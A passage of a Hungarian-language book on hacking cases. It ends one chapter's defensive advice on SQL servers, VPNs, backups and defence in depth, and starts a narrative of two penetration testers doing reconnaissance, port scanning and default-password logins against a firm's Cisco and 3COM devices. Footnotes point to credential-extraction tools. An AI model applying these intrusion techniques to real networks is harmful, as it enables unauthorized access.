hostnevek nyilvánosságra kerülését az osztott horizontú (split-horizon)
DNS megvalósításával előzhetjük meg, amelynek belső és külső
névszervere is van. A külső névszerver zónafájljában csak a
nyilvánosan elérhető hostokra hivatkoznak, és a támadásoktól sokkal
jobban védett belső névszervert használják a céges hálózat belső DNS
kéréseinek feloldására.

A Microsoft SQL szerverek védelme

Erik talált egy Microsoft SQL szervert futtató backup levelező és


webszervert, amelyen a felhasználói név és a jelszó ugyanaz volt, mint
a forráskód „include” fájlokban azonosított név és jelszó. Az SQL
szervert jogos üzleti igény hiányában soha nem lett volna szabad az
Internetnek kitenni. Noha az „SA” (rendszergazda) fiókot átnevezték, a
támadó egy nem védett forráskódfájlban azonosította az új felhasználói
nevet és jelszót. A legjobb gyakorlat az 1433-as port (a Microsoft SQL
szerver) kiszűrése, kivéve, ha arra tényleg feltétlenül szükség van.

Titkos fájlok védelme

A fejezet történeteiben szereplő támadások végeredményben azért


lehettek sikeresek, mén a forráskódot nem megfelelően biztosított
szervereken tárolták. Olyan szigorúan bizalmas környezetekben, mint
az R&D cég vagy fejlesztési csoportja egy másik biztonsági réteget kell
használni titkosítási technikák alkalmazásával.
Egy egyedül dolgozó fejlesztő számára megfelelő (azonban egy
olyan fejlesztőcsapat számára, ahol több embernek kell a fejlesztés alatt
levő termék forráskódjához hozzáférnie, valószínűleg nem túl
praktikus) megoldás az olyan szigorúan bizalmas adatok, mint a
forráskód PGP Disk vagy PGP Corporate Disk megoldásokkal történő
titkosítása. Ezek a termékek virtuális titkosított lemezeket hoznak létre,
azonban úgy működnek, hogy a folyamat átlátható marad a felhasználó
számára.

Biztonsági másolatok védelme

Miként a történetek feltárták, az alkalmazottak – még a biztonsági


kérésekben különösképpen tudatos felhasználók is – figyelmen kívül
hagyhatják a biztonsági másolatok, ideértve az e-mailek biztonsági
másolatát tartalmazó fájlok jogosulatlan személyek által történő
megtekintése elleni védelmét. Saját korábbi hackerkarrierem során
rengeteg olyan rendszergazdával találkoztam, akik védtelenül hagyták
a bizalmas anyagokat tartalmazó könyvtárak tömörített mentéseit. És
miközben egy nagy kórház informatikai osztályán dolgoztam, azt
láttam, hogy a bérszámfejtési adatbázisról rutinszerűen biztonsági
másolatot készítettek, majd mindenfajta védelem nélkül hagyták –
bármely hozzáértő alkalmazott hozzáfért az abban foglaltakhoz.
Robert egy másik aspektusát használta ki ennek a gyakori
figyelmetlenségnek, amikor a kereskedelmi levelezőlista alkalmazás
forráskódjának biztonsági másolatát a webszerver egy nyilvánosan
elérhető könyvtárában találta meg.

Az MS SQL Injection támadások elleni védelem

Robert szándékosan eltávolította a webalapú alkalmazásból az input


érvényesítő ellenőrzéseket, amelyeket azért alakítottak ki, hogy
megakadályozzák az SQL parancsok illegális bevitelét. A következő
alapvető lépésekkel megelőzhető, hogy szervezetünk a Robert által
használthoz hasonló típusú támadás áldozatává váljon:
Soha ne futtassunk Microsoft SQL szervert rendszerkontextus alatt.
Mérlegeljük az SQL szerverszolgáltatás egy másik fiókkontextus alatti
használatát.
Amikor programokat fejlesztünk, dinamikus SQL lekérdezéseket elő
nem állító kódot írjunk.
Használjunk tárolt eljárásokat az SQL lekérdezések végrehajtására.
Állítsunk be egy olyan fiókot, amelyet kizárólag a tárolt eljárások
futtatására használunk, és állítsuk be a fiókon a megfelelő
jogosultságokat, hogy az csak a szükséges feladatokat hajthassa végre.

A Microsoft VPN szolgáltatások használata

A Microsoft VPN hitelesítéshez a Windows Authenticationt


(Windows hitelesítést) használja, ami megkönnyíti a támadónak, hogy
a gyenge jelszavakat kihasználva hozzáférést szerezzen a VPN-hez.
Bizonyos környezetekben szükséges lehet smartkártyás hitelesítést
használni a VPN hozzáférésekhez – újabb példa arra, ahol a megosztott
titoknál erősebb formájú hitelesítés megsokszorozhatja a védelmi
szintet. Egyes esetekben az is célszerű, ha a VPN-hez való hozzáférést
a kliens IP-címe alapján szabályozzuk.
Robert támadásánál a rendszergazdáknak figyelniük kellett volna,
hogy nem adtak-e új felhasználókat a VPN csoporthoz. További szóba
jöhető, korábban már szintén említett intézkedések az alvó fiókok
eltávolítása a rendszerből; biztosítani kell egy olyan eljárást, amely
időben eltávolítja és deaktiválja a távozó alkalmazottak fiókjait, és –
ahol ez célszerű – a VPN és betárcsázó hozzáféréseket a nap bizonyos
szakára és a hét bizonyos napjaira kell korlátozni.

Telepítési fájlok eltávolítása

Robert nem úgy jutott hozzá az általa megszerezni kívánt


levelezőlistákhoz, hogy a levelezőlista alkalmazás valamilyen hibáját
kihasználta, hanem az alkalmazás alapértelmezett telepítési
szkriptjének egy sebezhetőségével élt vissza. Az alkalmazás sikeres
telepítése után el kell távolítani a telepítési szkriptet.

A rendszergazdai fiókok átnevezése

Bárki, aki Internet kapcsolattal rendelkezik, könnyedén rákereshet a


Google-ben az alapértelmezett jelszavak listájára („default password
list”), amivel olyan oldalakra juthat, amelyek a gyártó által (a
szállításkori alapértelmezett állapotban) beállított felhasználói neveket
és jelszavakat tartalmazzák. Ebből következően célszerű a vendég és a
rendszergazdai fiókokat átnevezni. Ennek persze nincs értelme, ha a
felhasználói nevet és a jelszót szabadon, védelem nélkül tárolják,
ahogy az az Erik által megtámadott cégnél is történt. [4]

A Windows megerősítése bizonyos hitelesítők tárolásának


elkerülésével

A Windows alapértelmezett beállítása szerint automatikusan a


gyorsítóba (cache-be) tölti és ott eltárolja a betárcsázáshoz használt
nyílt szöveges jelszavakat. Miután megszerzi a kellő jogosultságokat, a
támadó megkísérli kinyerni a lehető legtöbb információt, többek között
a registryben vagy a rendszer más területein tárolt jelszavakat.
Egy bizalmi helyzetben levő belsős egy egész tartományt
veszélyeztethet egy kis social engineering trükk segítségével, ha a
munkaállomása helyileg cache-eli a jelszavakat. A háborgó
bennfentesünk műszaki támogatást kér arra panaszkodván, hogy nem
tud bejelentkezni a munkaállomására. Azt akarja, hogy azonnal jöjjön
egy műszaki szakember. A technikus előkerül, bejelentkezik a saját
hitelesítő azonosítóival, és kijavítja a „problémát”. Nem sokkal ezután
a belsős kivonatolja a technikus jelszó hash-ét és feltöri, így
ugyanolyan rendszergazdai jogosultságokat szerez alkalmazottként,
mint a technikus. (Ezek a cashe-elt hash-ek duplán hash-eltek, így egy
másik programra van szükség a kibogozásukhoz és feltörésükhöz.)
Számos program, így az Internet Explorer és az Outlook is a
registrybe cache-eli a jelszavakat. Ha szeretne többet megtudni ennek a
funkciónak a kikapcsolásáról, keressen rá a Google-vel a „disable
password caching” (jelszó cache-elés kikapcsolása) kifejezésre.

Mélységi védelem

A fejezetben bemutatott történetek – talán a könyviben szereplő


összes történetnél hatásosabban – igazolják, hogy nem elégséges
csupán a cég hálózatának elektronikus határvonalát védeni. A mai
világban a határvonal feloldódik, hiszen a cégek felhasználókat hívnak
meg a hálózatukba. És a tűzfal mint olyan nem fog minden támadást
megállítani. A hacker, azzal, hogy a tűzfalszabályok által engedélyezett
szolgáltatással visszaél, megkeresi a falon a lyukat. Lehetséges
védekezési stratégia a nyilvánosan elérhető rendszereket a saját
hálózati szegmensükre helyezni, és gondosan megszűrni a titkosabb
hálózati szegmensekbe menő forgalmat.
Ha például egy SQL háttérszerver a céges hálózaton van, fel lehet
állítani egy másodlagos tűzfalat, amely csak a szolgáltatást futtató
porthoz engedi a csatlakozást. A belső tűzfalaknak a titkos információs
eszközök védelmére történő beállítása nyűgnek tűnhet, azonban
rendkívül fontos az olyan esetekben, amikor igazán meg kívánjuk
védeni adatainkat a rosszindulatú belsősöktől és a határvonalon már
behatolt külső támadóktól.
ZÁRÓJELBEN

Az eltökélt behatolókat semmi sem tántorítja el céljaik elérésétől.


Egy türelmes támadó alaposan megvizsgálja a célhálózatot, felfigyel az
összes elérhető rendszerre és a nyilvánosságnak kitett szolgáltatásokra.
A hacker hetekig, hónapokig vagy akár évekig várhat arra, hogy talál
és kihasznál egy nem kezelt sebezhetőséget. Korábbi hackerkarrierem
alatt végtelennek tűnő órákat töltöttem a rendszerek feltörésével.
Állhatatosságom kifizetődött, hiszen szinte mindig sikerült
megtalálnom a rést a falon.
Erik, a hacker ugyanerről az állhatatosságról és eltökéltségről tett
tanúbizonyságait erőfeszítése során, hogy mintegy kétéves munkával
megszerezze a hőn áhított forráskódot. És Robert is összetett, aprólékos
lépések sorozatát hajtotta végre céltudatos munkája során, amikor a
spammereknek értékesítendő e-mail címek millióit lopta el, és amikor –
Erikhez hasonlóan – a célba vett forráskódot kívánta megszerezni.
Meg kell értenünk, hogy ez a két hacker semmiképpen sem egyedi
eset. Állhatatosságuk mértéke egyáltalán nem rendkívüli a
hackerközösségen belül. A szervezetek infrastruktúrájának
biztonságáért felelős szakembereknek meg kell érteniük, hogy mire
számíthatnak. Egy hackemek végtelenül sok ideje van arra, hogy
csupán egyetlen rést találjon, míg a túlterhelt hálózati
adminisztrátoroknak és rendszergazdáknak nagyon kevés idő áll
rendelkezésükre, hogy megerősítsék a szervezet védelmét.
Ahogy Szun Ce olyan kifejezően írta A hadviselés művészete című
könyvében: „Ismerd önmagad és ismerd ellenséged, és akkor nem
győzhetnek le száz csatában sem. Ha azonban nem ismerjük az
ellenséget, csak magunkat ismerjük, akkor egyszer győzünk, másszor
vereséget szenvedünk. Az üzenet egyértelmű: ellenségeink bármennyi
időt rászánnak arra, hogy megszerezzék, amit kívánnak. Ennek
megfelelően kockázatértékelést kell végrehajtani a szervezettel
szemben valószínű fenyegetések azonosítására, és a biztonsági stratégia
megalkotásakor figyelembe kell venni ezeket a fenyegetéseket. Ha az
információbiztonsági politika megtervezésével, meg valósításával és
betartatásával jól felkészülünk és „kellő gondossággal” járunk el, akkor
jó úton haladunk, hogy falainkon kívül tartsuk a támadókat.
Az igazat megvallva, a megfelelő erőforrásokkal rendelkező ellenség
végül úgyis be fog jutni, célunk az lehet, hogy ezt olyan bonyolulttá és
akkora erőpróbává tegyük, hogy ne érje meg a ráfordítandó időt.

JEGYZETEK

1. Érdekli a saját L5A titkainak és a védett tároló területeknek a


megtekintése? Csupán a Coin & Abel nevű, a www.oxid.it oldolról
beszerezhető ravasz kis eszközre van szüksége.
2. Ez az oldal már nem elérhető, de mások átvették a helyét.
3. A Tripwire-ről további információért lásd a www.tripwire.com
oldalt.
4. Az egyik népszerű oldal, ahol a hackerek utánanézhetnek az
alapértelmezett jelszavaknak, az a www.phenoelit.de/dpl/dpl.htmi. Ha
az ön cége is fel van itt sorolva, tegye meg a megfelelő intézkedéseket.

9. fejezet

A kontinensen
Csak információmorzsákat látsz és azt, ahogy dolgok felépülnek,
majd apránként betekintést nyersz a cégbe, illetve az informatikai
rendszerekért felelős emberek munkájába. És ott van még az az érzés,
hogy ezt meg azt tudják ugyan a biztonságról, de valamit talán egy
kicsit rosszul csináltak.
Louis
A 8. fejezet elején elhangzott a figyelmeztetés, hogy a technikában
kevésbé jártas olvasók egyes részeket nehezen követhetőnek
találhatnak. Ez a továbbiakban is igaz. Ennek ellenére kár lenne
kihagyni ezt a fejezetet, mivel a tönénet sok szempontból lenyűgöző. A
lényeg a technikai részletek átugrása esetén is könnyedén követhető.
A történet két hasonló gondolkodású fiatalemberről szól, akik
hackeléssel megbízott cégnél dolgoznak, és akiket soha nem kaptak el.

Valahol Londonban

A színhely London szíve, a „City”.


Képzeljünk el „egy egylégterű, ablak nélküli helyiséget egy épület
hátsó részében, ahol egy rakás műszaki beállítottságú fickó dolgozik
együtt”. „Társadalmon kívüli, a külvilág által nem befolyásolt
hackerekre” gondoljunk, akik mindegyike lázasan dolgozik saját
asztalánál, ám eközben folyamatosan megy közöttük az ugratás.
A többiekkel együtt ebben a névtelen szobában ül egy srác, akit
Louis-nak fogunk hívni. Anglia északi részén, egy elszigetelt kis
városban nőtt fel, és hétéves korában kezdett a számítógépekkel
foglalkozni, amikor a szülei egy régi számítógépet vásároltak, hogy a
gyerekek megismerkedhessenek a számítástechnikával. Általános
iskolásként kezdett hackelni, amikor az iskolai személyzet felhasználói
neveit és jelszavait tartalmazó listára bukkant, és ez felkeltette az
érdeklődését. A hackelés hamar bajba sodorta, amikor egy idősebb diák
(az angol szokások szerint egy az utolsóévesek közül választott
felügyelő) beárulta Louis-t. Azonban a lebukás sem tudta eltéríteni a
számítógépek titkainak megismerése iránti vágytól.
Mára felnőtt, besötétült a haja, és nem sok ideje van az „igazi angol
sportokra” – a krikettre és a labdarúgásra amelyeket iskolásként
annyira szeretett.

Belemerülés

Egy-két évvel ezelőtt Louis és a számítógépén mellette dolgozó


cimborája, Brock közösen vállaltak el egy projektet. A célpont egy
európai országban levő vállalat, egész pontosan egy biztonsági cég
volt, amely hatalmas pénzösszegeket, valamint rabokat szállított –
utóbbiakat a fogda és a bíróság között, illetve egyik börtönből a
másikba. (Az ötlet, hogy ugyanazon cég készpénzt mozgat és rabokat is
szállít, újszerű lehet az amerikaiaknak, azonban Angliában és a
kontinentális Európában megszokott „árukapcsolás”.)
Minden, magát a „biztonsági” szó használatával bemutató cég
különösen nagy kihívást jelent. Ha biztonsággal foglalkoznak, az azt
jelenti, hogy annyira biztonságtudatosak, hogy nem lehet hozzájuk
betörni? Egy hacker mentalitású srácokból álló csoport számára ez az a
kihívás, aminek nem lehet ellenállni, különösen akkor, ha – ahogy ez
most is így volt – a célvállalat nevén kívül semmi nem volt, amin a fiúk
elindulhattak volna.
– Megoldandó problémaként kezeltük. Első dolgunk az volt, hogy
minél több információt szerezzünk a cégről – mondja Louis.
Kezdésként rákerestek a cégre a Google-n, sőt az oldalt fordításra is
felhasználták, mivel egyikük sem beszélte az adott ország nyelvét.
Az automata fordítóprogram elég pontos volt ahhoz, hogy
elképzelésük legyen a cég tevékenységéről és méretéről. A fiúk nem
nagyon rajonganak a social engineering támadásokért, a nyelvi
akadályok miatt itt azonban még azok lehetősége is ki volt zárva.
A cég weboldalából és levelezőszerveréből, illetve az európai IP-cím
nyilvántartásból (Reseaux IP Europeens – RIPE) képesek voltak
kideríteni a cégnek nyilvánosan kiosztott IP-címek tanományát. (A
RIPE az amerikai American Registry of Internet Numbers (ARIN)
szervezethez hasonló feladatot lát el. Az ARIN kezeli az Egyesült
Államokbeli és az USA-hoz tartozó területek IP-cím számokat. Mivel
az Internet címeknek egyedieknek kell lenniük, szükség van egy olyan
szervezetre, amely szabályozza és kiosztja az IP-cím számblokkokat. A
RIPE kezeli az európai területekhez tartozó IP-címeket.)
Kiderült, hogy fő weboldaluk külső volt, a hosting szolgáltatást egy
külsős cég nyújtotta. A levelezőszerverük IP-címe azonban magához a
céghez volt bejegyezve, és a saját címtartományukon belül
helyezkedett el. így a fiúk a cég jogosult Domain Name Service (DNS)
szerverén IP-címeket kerestek a levelezőrekordok átvizsgálásával.
Louis a nem létező címre küldött e-mail technikájával is
megpróbálkozott. Ilyenkor a visszapattanó üzenet közli vele, hogy a
levél nem kézbesíthető, és olyan fejléc-információkat tartalmaz,
amelyek a cég néhány belső IP-címét, illetve bizonyos routing
(útvonalkiválasztó) információt tárnak fel. Ebben az esetben azonban
Louis a cég külső postafiókjáról „lepattanó” választ kapott; az e-mailje
csak a külső levelezőszerverig jutott, így a „kézbesíthetetlen” válasz
nem tartalmazott hasznos információt.
Brock és Louis tudta, hogy a helyzetük sokkal jobb lenne, ha a cég
maga hostolná a saját DNS szerverét. Ebben az esetben ugyanis
megpróbálhatnának információt szerezni a cég belső hálózatáról, vagy
kihasználhatnák a DNS-ük esetleges sebezhetőségeit. A hír nem volt
jó: a DNS szerverük máshol volt, valószínűleg az Internet-
szolgáltatójuknál (vagy, hogy a brit terminológiát használjuk, a
telefonszolgáltatójuknál).

A hálózat feltérképezése

Következő lépésként Louis és Brock egy fordított DNS keresést


hajtott végre a cég IP-cím tartományán belül található különböző
rendszerek hostneveinek kiderítésére (a módszert a 4., Rabló-pandúr
című fejezetben mutattuk be). Ehhez Louis egy a fiúk által írt
„egyszerű PERL-szkriptet” használt. (A támadók a fordított DNS
keresésekhez általában valamilyen szoftvert futtatnak, vagy olyan
weboldalt használnak, mint például a www.samspade.org.)
Észrevették, hogy „egyes rendszerekről meglehetősen árulkodó
nevek jönnek vissza”, amelyek a rendszereknek a cégben betöltött
funkciójára utaltak. Ez a cég informatikusainak gondolkodásába is
betekintést engedett. – Úgy tűnt, hogy a rendszergazdák nem teljes
mértékben tudták szabályozni, hogy milyen információ legyen elérhető
a hálózatukról, és ez erősítette az első megérzésünket arra
vonatkozóan, hogy képesek leszünk-e hozzáférést szerezni. – Brock és
Louis biztatónak érezte a jeleket.
Jó példa a rendszergazdák pszichoanalízisére, annak megkísérlésére,
hogy a támadók az ő fejükkel gondolkodva próbálják meg kitalálni,
hogyan épülhet fel a hálózat. A fiúk esetében „ez részben az adott
európai országban látott hálózatokkal és cégekkel kapcsolatos
ismereteinken, részben pedig a vélt informatikai tudásszintjükön
alapult, amely az adott országban tapasztalataink szerint körülbelül
másfél-két évvel az egyesült királyságé mögött volt”.

Egy router azonosítása

Ezt követően a Unix egyik parancsával, a traceroute-tal


(útvonalkövetés) elemezték a hálózatot. A traceroute azokat a
routereket számolja meg, amelyeken az adatcsomag a meghatározott
célig áthalad; a szakzsargonban „hopok” számaként hivatkoznak erre.
Traceroute-ot futtattak a levelezőszerverhez és a tűzfalhoz. Ebből
kiderült, hogy a levelezőszerver egy hoppal volt a tűzfal mögött.
Az információból arra következtettek, hogy a levelezőszerver vagy a
DMZ-ben van. vagy pedig a tózfal mögötti összes rendszer ugyanazon
a hálózaton üzemel. (A DMZ az úgynevezett demilitarizált övezet –
elektronikus senki földje hálózat, amely két tűzfal között helyezkedik
el, és a belső hálózatról és az Internetről általában egyaránt elérhető. A
DMZ célja a belső hálózat védelme arra az esetre, ha az Internetnek
kitett rendszerek bármelyikét feltörnék.)
Tudták, hogy a levelezőszerveren a 25-ös port nyitva van, és a
traceroute lefuttatásából az is kiderült, hogy át tudnak hatolni a
tűzfalba, hogy a levelezőszerverrel kommunikáljanak. – Láttuk, hogy
az az útvonal ezen a router eszközön vitt minket keresztül, majd a
következő hopnál – ami tulajdonképpen a tűzfal volt – eltűnni látszott,
majd egy hoppal a mögött a levelezőszervert láttuk, így hozzávetőleges
elképzelésünk volt arról, hogyan épül fel a hálózat.”
Louis elmondta, hogy sokszor azzal kezdik, hogy a tűzfalak által
feltételezetten nyitva hagyott gyakori portokkal próbálkoznak, és
megnevezett néhány olyan szolgáltatást, mint például az 53-as port
(amit a DNS használ), a 25-ös (az SMTP levelezőszerver), a 21-es
(FrP); a 23-as (telnet); a 80-as (HTTP); a 139-es és a 445-ös
(mindkettőt a NetBIOS-hoz használják a Windows különböző
verzióiban).
Mielőtt benyomulásos portszkennelést hajtottunk végre, figyeltünk
arra, hogy nem használt rendszerek IP-címeit nem tartalmazó hatékony
céllistánk. A kezdeti szakaszban egy olyan céllistára van szükség,
amely nem csak vaktában tartalmazza a címeket, és nem csak
egyszerűen letapogatja az összes IP-címet. Miután számba vesszük a
célpontokat, öt vagy hat olyan rendszer marad, amit tovább akarunk
vizsgálni.
Ebben az esetben összesen csak három nyitott portot találtak: egy
levelezőszervert, egy webszervert, amelyre minden biztonsági javítást
telepítettek, azonban szemmel láthatóan nem használták, és a 23-as
porton a telnet szolgáltatást. Amikor megpróbáltak betelnetezni a
gépre, a szokásos „User Access Verification” (Felhasználói Hozzáférés
Megerősítése) Cisco jelszó parancssort kapták. Ezzel egy kicsit előrébb
jutottak – most már legalább azt tudták, hogy Cisco gyártmánnyal
állnak szemben.
Louis tapasztalatból tudta, hogy egy Cisco router jelszava igen
gyakran nagyon egyértelmű. – Ebben az esetben három jelszóval
próbálkoztunk – a cég nevével, illetve a blank és a cisco szavakkal,
azonban nem sikerült bejutni a routerbe. így ahelyett, hogy túl nagy
zajt csaptunk volna itt, úgy döntöttünk, hogy abbahagyjuk a
hozzáférés-szerzési próbálkozásainkat.
Megpróbálták gyakori portok után kutatva letapogatni a Cisco
berendezést, de sehova nem jutottak.
Így az elsőnap egy csomó időt töltöttünk a cég és a hálózatuk
elemzésével, és végeztünk némi kiinduló portszkennelést. Nem
mondanám, hogy feladtuk volna, mert volt még jó néhány trükk, amit
biztosan kipróbálunk, mielőtt lemondanánk a dologról.
Első napi erőfeszítéseik összegzése nem sokkal több eredményt
mutatott az egyetlen sikeresen beazonosított routernél.

A második nap

Louis és Brock intenzívebb portszkennelésre készen kezdtek neki a


második napnak. A szolgáltatás szót a nyitott portokra értve Louis a
következőket mesélte:
Ennél a pontnál azt gondoltuk magunkban, hogy több szolgáltatást
kell találnunk ezeken a gépeken. Ezért egy kicsit feltekertük a hangerőt,
és megpróbáltunk valami olyasmit találni, ami igazán segíteni fog
abban, hogy bejussunk ebbe a hálózatba. Azt láttuk, hogy a
tüzfalszürésük igen jó. Igazából olyasvalamit kerestünk, amit véletlenül
engednek be és/vagy valamit, amit hibásan állítottak be.
Ezt követően az Nmap programmal, a portszkennelés elterjedt
eszközével egy olyan letapogatást futtattak a program alapértelmezett
szolgáltatásfájlja használatával, amely körülbelül 1600 portot keresett;
ám ismét üres kézzel távoztak – semmi jelentőset nem találtak.
– Így hát teljes körű portszkennelést végeztünk a routereket és a
levelezőszervereket egyaránt letapogatva. – A teljes körű
portszkennelés több mint 65000 port vizsgálatát jelenti. – Minden
egyes TCP portot letapogattunk, és a listánkon rajta levő lehetséges
szolgáltatások után kutattunk ezeken a hostokon.
Ez alkalommal találtak valami érdekeset, ami egyben furcsa és kicsit
zavaros is volt.
A 4065-ös port nyitva volt; szokatlan egy ilyen magas számú portot
használni Louis így magyarázta: – Ekkor azt gondoltuk, hogy talán egy
telnet szolgáltatás van a 4065-ös portra konfigurálva. így
betelneteztünk abba a portba, hogy lássuk, igazolni tudjuk-e ezt a
feltevésünket. – (A telnet olyan protokoll, amit arra használnak, hogy
távolról, az Internet bármely részéről vezéreljenek egy másik gépet. A
telnet használatával Louis csatlakozik a távoli porthoz, amely ezt
követően fogadja a gépéről érkező parancsokat, és úgy válaszol rájuk,
hogy az közvetlenül Louis képernyőjén jelent meg.)
Amikor megpróbáltak csatlakozni a porthoz, válaszként a
felhasználói névre és a jelszóra vonatkozó kérést kaptak. Igazuk volt, a
portot valóban a telnet szolgáltatáshoz használták – azonban a
felhasználó ellenőrzésére használt párbeszédablak nagyon különbözött
a Cisco telnet szolgáltatásétól. – Egy idő után valamilyen 3COM
eszközként azonosítottuk. Ez igazán felcsigázta az érdeklődésünket a
munka iránt, mivel nem mindennap találkozunk egy olyan Cisco
routerrel, amely úgy néz ki, mint egy másik eszköz, illetve ritkán
találunk bármilyen szolgáltatást egy ilyen magas számú TCP porton. –
De a tény, hogy a 4065-ös porton levő telnet szolgáltatással egy 3COM
eszközt lehetett elérni, érthetetlen volt számunkra.
Két nyitott portunk volt ugyanazon az eszközön, és azok teljesen
különböző, tökéletesen más gyártók által készített eszközként
azonosították magukat.
Brock megtalálta a magas számú TCP portot, és telnet használatával
csatlakozott hozzá. – Amikor megjelent a belépési parancssor, azt
kiáltottam neki, hogy próbálja meg az admin-t [felhasználói névnek] és
az olyan tipikus jelszavakat, mint a password, az admin és a blank.
Ennek a háromnak a különböző kombinációit próbálta ki felhasználói
névként és jelszóként, s alig néhány próbálkozás után megütötte a
főnyereményt: a 3COM eszközön mind a felhasználói név, mind a
jelszó admin volt. – Ekkor visszakiabált, hogy bejutott – mondja Louis,
arra utalván, hogy sikerült telnet hozzáférést szerezniük a 3COM
eszközhöz. A tény, hogy ez egy rendszergazdai felhasználó név volt,
csak a hab volt a tortán.
Ahogy kitaláltuk a jelszót, kezdett érdekes lenni a dolog.
A szokásos munkamegosztás volt. Különbözőmunkaállomásokon
dolgoztunk. Kezdetben, amíg a hálózati és feltérképezési letapogatást
végeztük, a saját gépünknél ültünk, és megosztottuk egymás között az
információkat. De amint megtalálta a portot, amely hozzáférést adott
neki ahhoz a bejelentkezési parancssorhoz, odamentem a gépéhez, és
együtt, mindketten ugyanannál a gépnél kezdtünk dolgozni.
Király volt. Egy 3COM eszköz volt, amelyhez konzolon keresztüli
hozzáférést szereztünk.
Az elsődolog, amit ki akartunk deríteni, az volt, hogy pontosan mi ez
a 3COM eszköz, és miért volt elérhetőa Cisco router egy magas számú
portján.
A parancssori kezelőfelületen keresztül képesek voltak információt
lekérni az eszközről. – Azt gyanítottuk, hogy valaki a Cisco
berendezésbe dugta az ebből a 3COM eszközből jövő konzolkábelt, és
akaratlanul lehetővé tette a hozzáférést. – Ennek volt értelme, mivel ez
kényelmes módszer volt arra, hogy az alkalmazottak a routeren
keresztül telnetezzenek be a 3COM eszközbe. – Talán nem volt elég
monitor vagy billentyűzet az Adatközpontban – vélte Louis, és
szükségmegoldásként alkalmazták a kábelt. Amikor pedig már nem
volt rá szükség, a kábelt bedugó rendszergazda elfeledkezett az
egészről. Nyugodtan odébbállt, gondolta Louis, és „fogalma sem volt
lépésének következményeiről”.

A 3COM eszköz konfigurációjának áttekintése

A fiúk most már tudták, hogy a 3COM eszköz a tűzfal mögött volt,
és a rendszergazda hibája egy kerülő utat biztosított, amely lehetővé
tette a támadóknak, hogy a magas számú nyitott porton keresztül a
tűzfal mögött csatlakozzanak.
Most, hogy már hozzáfértek a 3COM konzolhoz, megnézték a
beállításait, többek között az egységhez hozzárendelt IP-címet és a
virtuális magánhálózathoz való csatlakozásnál használt protokollokat.
Azt is észrevették, hogy az eszköz ugyanazon a címtartományon
működött, mint a levelezőszerver, egy-belső tűzfalon kívül, a DMZ-n.
– Arra a következtetésre jutottunk, hogy a külső tűzfal mögött
helyezkedett el, és szűrőszabályok használatával védték az Internettől.
Megpróbálták megnézni magát az eszköz konfigurációját, hogy
lássák, hogy van vannak beállítva a bejövő kapcsolatok, de az
interfészen keresztül nem tudtak elég információhoz jutni. Ennek
ellenére azt gyanították, hogy amikor valamelyik felhasználó
valahonnan az Internetről a Cisco routeren levő 4065-ös porthoz
csatlakozott, a kapcsolódás valószínűleg a Cisco routerbe dugott
3COM eszközhöz történt.
Így ekkor meglehetősen biztosak voltunk abban, hogy hozzáférést
fogunk szerezni a háttérhálózatokhoz, és széles körű irányításunk alá
vonjuk a belsőhálózatot. Ennél a pontnál nagyon jó hangulatban
éreztük magunkat, ám ugyanakkor igen fáradtak voltunk, hiszen két
teljes napot dolgoztunk már a feladaton.
Elmentünk egy kocsmába, és arról beszélgettünk, hogy a
következőnap nagyszerű lesz, mert akkor már kezdünk látni valamit a
végfelhasználói rendszerekből, és mélyebbre jutunk a hálózatban.
Kíváncsiak lévén a 3COM eszközre, úgy állították be a rendszert,
hogy megszerezzék a valós idejű konzolnaplót. Ha valamilyen
tevékenység történik az éjjel, azt a következő reggel látni fogják.
A harmadik nap

Amikor reggel Brock megvizsgálta a konzolnaplót, különböző IP-


címeket látott megjelenni. Louis a következőket mondta:
Miután kicsit jobban körbejártuk ezt a 3COM eszközt, rájöttünk,
hogy valamilyen VPN volt, amivel a távoli felhasználók az Internetről
csatlakozhattak a céges hálózathoz. Ennél a pontnál nagyon
belelkesedtünk, hogy hozzáférést fogunk szerezni, mégpedig ugyanúgy,
ahogy a jogosult felhasználók teszik.
Saját személyes VPN kezelői felületet próbáltak beállítani a 3COM
eszközön egy másik kezelői felületet előhozva a 3COM gépen, egy
olyat, amelynek más az IP-címe, és így azt a tűzfal nem szűri ki.
Nem működött. Azzal szembesültek, hogy az eszközt nem lehet a
jogosult szolgáltatások szétrombolása nélkül konfigurálni. Nem tudtak
felállítani egy ugyanúgy konfigurált VPN rendszert, és az architektúra
felépítése eléggé korlátozta őket ahhoz, hogy ne tudják végrehajtani,
amit akarnak.
Szóval ez a támadási útvonal gyorsan besötétedett.
Ekkor egy kicsit letörtünk, magunk alatt voltunk. Azonban ez még
csak az elsőpróbálkozás volt, és kellett hogy legyen egy másik út is.
Még mindig volt bennünk elég ösztönzés, és továbbra is hozzáfértünk
ehhez az egy eszközhöz; a hídfőállás még megvolt. Egyfajta eltökéltség
uralkodott el rajtunk, hogy igenis továbbmenjünk ezzel a dologgal.
A céges hálózat DMZ-jében voltak, de amikor megpróbáltak kifele
irányban kapcsolódni a saját rendszereikhez, az nem sikerült.
Pingeléssel is próbálkoztak a hálózaton levő összes rendszert
megpingelve, a pingeket a tűzfal mögötti 3COM rendszerről indítva
annak érdekében, hogy olyan potenciális rendszereket
azonosíthassanak, amelyeket hozzáadhatnak a listájukhoz. Ha
bármilyen gépcím van a cache-ben, az azt jelenti, hogy valamilyen
eszköz blokkolja a magasabb szintű protokollhoz való hozzáférést. –
Néhány kísérlet után – mondja Loius – bejegyzéseket találtunk az ARP
cache-ben, ami azt jelezte, hogy egyes gépek elküldték a gépcímüket.
(Az ARP; az Address Resolution Protocol, vagyis a Címfeloldási
Protokoll deríti ki az IP-címből a host fizikai címét. Minden host
címfeloldásokat tartalmaz a cache-ben, ezzel csökkentve az
adatcsomagok továbbításának idejét.)
Nyilvánvalóan további gépek voltak a tartományban, „de azok nem
válaszoltak a pingekre – ez a tűzfal biztos jele”.
(A pingelés bizonyos csomagtípusoknak – Internet Vezérlőüzenet
Protokoll (Internet Control Message Protocol – ICMP) – a
célrendszerre való továbbítását használó hálózatletapogatási technika
annak meghatározására, hogy a host bekapcsolt állapotban van-e, és
képes-e a hálózati kérések feldolgozására. Ha a host aktív, „ICMP echo
reply” (ICMP visszhang válasz) csomaggal válaszol.) Louis így
folytatta: – Ez megerősíteni látszott azon benyomásunkat, hogy volt
egy másik tűzfal is, egy másik biztonsági réteg a 3COM eszköz és a
belső hálózatuk között.
Louis kezdte úgy érezni, hogy zsákutcába jutottak.
Hozzáfértünk ehhez a VPN eszközhöz, de nem tudtuk azon keresztül
beállítani a saját VPN-ünket. Ennél a pontnál kicsit lelohadt a
lelkesedésünk. Kezdtük úgy azt érezni, hogy nem fogunk előrébb jutni
